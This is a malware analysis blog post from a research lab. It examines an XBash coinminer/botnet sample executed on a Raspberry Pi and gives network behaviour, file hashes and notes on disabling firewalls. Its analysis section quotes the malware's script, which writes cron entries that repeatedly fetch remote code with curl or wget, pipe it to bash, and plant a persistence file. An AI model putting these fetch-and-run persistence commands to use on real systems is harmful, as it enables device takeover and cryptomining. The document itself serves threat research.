Aposemat IoT Malware Analysis, an X-Bash infection

This blog post was authored by María José Erquiaga (@MaryJo_E), on 2019-05-19

Sample Description

The sample was executed in a RapsberryPi from our IoT laboratory and the capture ID is 41-1.
The SHA256 of the sample that we executed in our laboratory is: d8040a64b88b4a738d333015ddd93a27187abb7584412df56633a7e7d12127f4.

As specified by VirusTotal analysis, this malware could be a CoinMiner, however, the name is not defined. The file name for the sample is mr.sh.

According to the blogpost written by Oleg Kolesnikov and Harshvardhan Parashar from Securonix this sample is in a group of malicious scripts that maintain persistence by creating a cronjob entry. According to the blogpost, the possible name for the malware we executed is XBash.

Another blogpost that describes XBash behavior mentione:

Xbash has ransomware and coinmining capabilities

According to this blogpost by Palo Alto researchers, XBash targeted Linux and Windows systems. XBash is a botnet, coinminer, ransomware that has self-propagation capabilities. On Linux, this malware has ransomware and botnet capabilities. For Windows systems, coinmining and self-propagating capabilities

Network behavior

This malware contacted a remote server with IP address on port 8220/TCP, and downloaded several files by using GNU Wget agent and curl. The domain registered to that IP is http://www.ovh.com. According to Virus Total analysis, some of the files referring to this IP are: mr.sh, 2mr.sh, 3mr.sh. The curl request looks like this:

GET /mr.sh HTTP/1.1
User-Agent: curl/7.52.1
Accept: */*

The network behavior is repetitive; the infected device contacted the IP on port 8220/TCP and downloaded in a span of 24 hours a total of 8646 files. The malware requests download the same files, named: mr.sh, 2mr.sh, 11, 1.so. The file names are the same, however, the files are different. For example, the file name 1.so was downloaded 4143 times. Two versions of the that were compared and turn out that there were different files and had different sha256 (see IoC section)

Downloaded files

Some one the downloaded files are:

According to VirusTotal, the name for those samples is not exact. Some of them are considered as a type of coin Miner, others as rootkit.

Analysis of the malware code executed

In the sample executed in the RaspberryPi, it is possible to see that the malware is creating files and changes permissions. Then, it stop the services iptables and SUSEfirewall. Also, it kills the processes sysxlj, jourxlv, sustes. Regarding the name of the services and proceses, it is possible to observe that this malware is clearly aiming linux based devices, specially those running SuseOS.

The malware creates crontab to download files (this behavior matches the network behavior and the behavior analyzed on the blogpost). The portion of the script doing this operation is the following:

echo -e "*/1 * * * * root (curl -s||wget -q -O -|bash -sh\n##" > /etc/cron.d/root
echo -e "*/2 * * * * root (curl -s||wget -q -O -|bash -sh\n##" > /etc/cron.d/apache
echo -e "*/30 * * * * (curl -s||wget -q -O -|bash -sh\n##" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo -e "* * * * * (curl -s||wget -q -O -|bash -sh\n##" > /var/spool/cron/crontabs/root
mkdir -p /etc/cron.hourly
(curl -fsSL --connect-timeout 120 -o /etc/cron.hourly/oanacroner1|| -O /etc/cron.hourly/oanacroner1) && chmod 755 /etc/cron.hourly/oanacroner1


  • File name: mr.sh
    sha 256: d8040a64b88b4a738d333015ddd93a27187abb7584412df56633a7e7d12127f4

  • File name: 11
    sha 256: 8955a8f071c5de865cfe2c0f58bc3dfb2d6054d037361e4eb56a6dc02780f4a0

  • File name: 2mr.sh
    sha 256: ba74e757ff0a6d0d28f075bf6eef0feba6bb29da9e6e81afcdd12b8b49f69b88

  • File name: 1.so
    sha 256: f7a97548fbd8fd73e31e602d41f30484562c95b6e0659eb37e2c14cbadd1598c

  • File name 1.so:

    sha 256: 90dff83ca6519cbdb490013273c1301f93614c983e2015f3224700ac1f028a8f


In the network capture, this malware doesn’t take anymore actions at a network level. It basically downloads the listed files several times.


This research was done as part of our ongoing collaboration with Avast Software in the Aposemat project. The Aposemat project is funded by Avast Software.

Thanks to Veronica Valeros for her help in the analysis and writing corrections.